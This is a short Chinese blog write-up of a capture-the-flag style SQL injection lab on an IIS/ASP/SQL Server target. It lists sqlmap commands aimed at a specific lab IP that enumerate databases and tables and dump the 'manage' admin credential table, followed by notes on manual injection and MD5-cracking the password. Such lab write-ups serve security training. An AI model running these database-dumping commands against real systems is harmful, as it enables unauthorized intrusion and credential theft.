靶环境:IIS+ASP+Sql Server,Aspx代码对客户端提交的参数未做任何过滤。
解题目标:
手工进行SQL注入测试,获取管理密码登录。
使用sqlmap获取数据库中的表名和字段名;如图:
通过:sqlmap.py -u http://219.153.49.228:48753/new_list.asp?id=2 --dbs 获取数据库中的表名

sqlmap.py -u http://219.153.49.228:48753/new_list.asp?id=2 --tables -D “mozhe_db_v2” 查看mozhe_db_v2中表:
sqlmap.py -u http://219.153.49.228:48753/new_list.asp?id=2 --dump -T “manage” -D “mozhe_db_v2” 查看manage表中数据字段

sqlmap.py -u http://219.153.49.228:48753/new_list.asp?id=2 --batch 通过该命令可以判断出该数据库为何种:

从图可知该数据为sql server
通过手工注入,发现回显点:
查询用户和密码:
MD5解密密码即可获得正确密码
SQL手工注入漏洞测试(Sql Server数据库)解题思路小记
博客围绕IIS+ASP+Sql Server靶环境展开,该环境中Aspx代码对客户端提交参数未过滤。解题目标是手工进行SQL注入测试获取管理密码登录,还介绍使用sqlmap获取数据库表名、字段名等信息,通过手工注入发现回显点,查询用户和密码,经MD5解密得正确密码。

被折叠的 条评论
为什么被折叠?



